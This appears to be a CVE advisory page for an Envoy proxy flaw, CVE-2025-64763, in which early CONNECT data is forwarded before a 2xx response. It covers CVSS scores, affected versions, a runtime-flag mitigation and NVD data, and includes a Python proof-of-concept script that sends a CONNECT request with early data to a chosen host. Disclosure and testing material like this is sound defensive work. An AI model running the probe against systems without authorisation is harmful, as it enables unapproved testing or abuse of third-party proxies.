Security Vulnerability Report
CVE-2025-64763 CVSS 3.7 LOW

CVE-2025-64763

Published: 2025-12-03 18:15:47
Last Modified: 2025-12-05 16:52:24

Description

Envoy is a high-performance edge/middle/service proxy. In 1.33.12, 1.34.10, 1.35.6, 1.36.2, and earlier, when Envoy is configured in TCP proxy mode to handle CONNECT requests, it accepts client data before issuing a 2xx response and forwards that data to the upstream TCP connection. If a forwarding proxy upstream from Envoy then responds with a non-2xx status, this can cause a de-synchronized CONNECT tunnel state. By default Envoy continues to allow early CONNECT data to avoid disrupting existing deployments. The envoy.reloadable_features.reject_early_connect_data runtime flag can be set to reject CONNECT requests that send data before a 2xx response when intermediaries upstream from Envoy may reject establishment of a CONNECT tunnel.
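How the mitigation flag named in the description is set in practice: an Envoy bootstrap fragment that enables envoy.reloadable_features.reject_early_connect_data through a static runtime layer. This is an added example, not configuration taken from the advisory or the Envoy project; the flag name comes from the description above, while the layer name static_layer_0 is an arbitrary choice.

```yaml
# Bootstrap fragment (added example): turn on the CVE-2025-64763 interim control
# via a static runtime layer. Only the flag name is taken from the advisory text;
# the layer name is an assumed, arbitrary value.
layered_runtime:
  layers:
  - name: static_layer_0          # assumed name, any unique name works
    static_layer:
      # Reject CONNECT requests that carry client data before a 2xx response
      # instead of forwarding that data to the upstream TCP connection. The
      # default (false) keeps the permissive behaviour described above.
      envoy.reloadable_features.reject_early_connect_data: true
```

The trade-off is the one the description states: with the flag on, clients that legitimately send tunnel data before waiting for the 2xx are rejected, which is why the default stays permissive. The advisory reference below is tagged as a patch, so upgrading to a release outside the affected ranges in the NVD configuration data (1.33.13, 1.34.11, 1.35.7 or 1.36.3 and later) is the durable fix; the runtime flag is the control for deployments that cannot upgrade yet.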

CVSS Details

Two CVSS 3.1 metrics are recorded for this CVE (see the Raw JSON Data section): a Secondary metric supplied by the reporting source and a Primary metric from NVD's own analysis. They differ only in Attack Complexity (High vs. Low), which is why the scores differ.

Secondary metric (reporting source)
CVSS Score
3.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Primary metric (NVD analysis)
CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Weakness
CWE-693 (Protection Mechanism Failure)

Configurations (Affected Products)

Version ranges below follow the NVD configuration data in the Raw JSON Data section (versionStartIncluding / versionEndExcluding), which matches the description's statement that 1.33.12, 1.34.10, 1.35.6 and 1.36.2 are the last affected releases in each branch.

cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:* - VULNERABLE (all versions before 1.33.13)
cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:* - VULNERABLE (1.34.0 up to, but not including, 1.34.11)
cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:* - VULNERABLE (1.35.0 up to, but not including, 1.35.7)
cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:* - VULNERABLE (1.36.0 up to, but not including, 1.36.3)
Envoy Proxy < 1.33.13
Envoy Proxy >= 1.34.0, < 1.34.11
Envoy Proxy >= 1.35.0, < 1.35.7
Envoy Proxy >= 1.36.0, < 1.36.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-64763 PoC - Envoy CONNECT Early Data Forwarding

This PoC demonstrates the vulnerability where Envoy forwards client data
before receiving a 2xx response for CONNECT requests.
"""
import socket
import ssl


def test_envoy_connect_vulnerability(target_host, target_port):
    """
    Test for CVE-2025-64763: Early CONNECT data forwarding

    The vulnerability allows data to be forwarded before 2xx response,
    which can cause tunnel state desync when upstream rejects the connection.
    """
    # The default context verifies the server certificate, so the listener
    # being tested must present a certificate valid for target_host.
    context = ssl.create_default_context()

    try:
        with socket.create_connection((target_host, target_port), timeout=10) as sock:
            with context.wrap_socket(sock, server_hostname=target_host) as ssock:
                # Send CONNECT request with early data appended directly after
                # the headers. The vulnerability is that Envoy forwards this
                # data upstream before a 2xx response has been received.
                connect_request = (
                    b'CONNECT target.example.com:443 HTTP/1.1\r\n'
                    b'Host: target.example.com:443\r\n'
                    b'Proxy-Authorization: Basic dXNlcjpwYXNz\r\n'
                    b'Content-Length: 100\r\n'
                    b'\r\n'
                    b'EARLY_DATA_BEFORE_2XX_RESPONSE\r\n'
                )
                ssock.sendall(connect_request)

                # Read the response headers (may be a non-2xx status relayed
                # from a forwarding proxy upstream of Envoy).
                response = b''
                try:
                    while True:
                        chunk = ssock.recv(4096)
                        if not chunk:
                            break
                        response += chunk
                        if b'\r\n\r\n' in response:
                            break
                except OSError:
                    # Timeout or reset while waiting for headers: report
                    # whatever was received so far.
                    pass

                print(f"Response: {response.decode('utf-8', errors='ignore')}")
                print("If data was forwarded before 2xx, the tunnel state may be desynced")
    except OSError as e:
        # Covers connection, timeout and TLS errors (ssl.SSLError is an OSError).
        print(f"Error: {e}")
        print("This may indicate the vulnerability or network issues")


if __name__ == "__main__":
    # Usage example
    print("CVE-2025-64763 PoC - Envoy CONNECT Early Data Vulnerability")
    print("=" * 60)
    target = input("Enter target host: ")
    port = int(input("Enter target port [443]: ") or "443")
    test_envoy_connect_vulnerability(target, port)

References

https://github.com/envoyproxy/envoy/security/advisories/GHSA-rj35-4m94-77jh (Patch, Vendor Advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-64763",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-03T18:15:47.037",
    "lastModified": "2025-12-05T16:52:24.367",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Envoy is a high-performance edge/middle/service proxy. In 1.33.12, 1.34.10, 1.35.6, 1.36.2, and earlier, when Envoy is configured in TCP proxy mode to handle CONNECT requests, it accepts client data before issuing a 2xx response and forwards that data to the upstream TCP connection. If a forwarding proxy upstream from Envoy then responds with a non-2xx status, this can cause a de-synchronized CONNECT tunnel state. By default Envoy continues to allow early CONNECT data to avoid disrupting existing deployments. The envoy.reloadable_features.reject_early_connect_data runtime flag can be set to reject CONNECT requests that send data before a 2xx response when intermediaries upstream from Envoy may reject establishment of a CONNECT tunnel."
      },
      {
        "lang": "es",
        "value": "Envoy es un proxy de borde/intermedio/servicio de alto rendimiento. En las versiones 1.33.12, 1.34.10, 1.35.6, 1.36.2 y anteriores, cuando Envoy está configurado en modo proxy TCP para manejar solicitudes CONNECT, acepta datos del cliente antes de emitir una respuesta 2xx y reenvía esos datos a la conexión TCP ascendente. Si un proxy de reenvío ascendente de Envoy responde con un estado que no es 2xx, esto puede causar un estado de túnel CONNECT desincronizado. Por defecto, Envoy continúa permitiendo datos CONNECT tempranos para evitar interrumpir las implementaciones existentes. El indicador de tiempo de ejecución 'envoy.reloadable_features.reject_early_connect_data' puede configurarse para rechazar solicitudes CONNECT que envían datos antes de una respuesta 2xx cuando los intermediarios ascendentes de Envoy pueden rechazar el establecimiento de un túnel CONNECT."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 3.7,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 1.4
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-693"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.33.13", "matchCriteriaId": "B303FFFE-9973-4E7E-8A8C-DE847B725534"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.34.0", "versionEndExcluding": "1.34.11", "matchCriteriaId": "4419A82D-995F-4DD0-BAE1-3825791245D3"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.35.0", "versionEndExcluding": "1.35.7", "matchCriteriaId": "C50E067C-AE0D-4B14-A442-53603039EFCD"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.36.0", "versionEndExcluding": "1.36.3", "matchCriteriaId": "B39C3DF2-E73F-4B66-9504-C24E329ACB54"}
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-rj35-4m94-77jh",
        "source": "[email protected]",
        "tags": ["Patch", "Vendor Advisory"]
      }
    ]
  }
}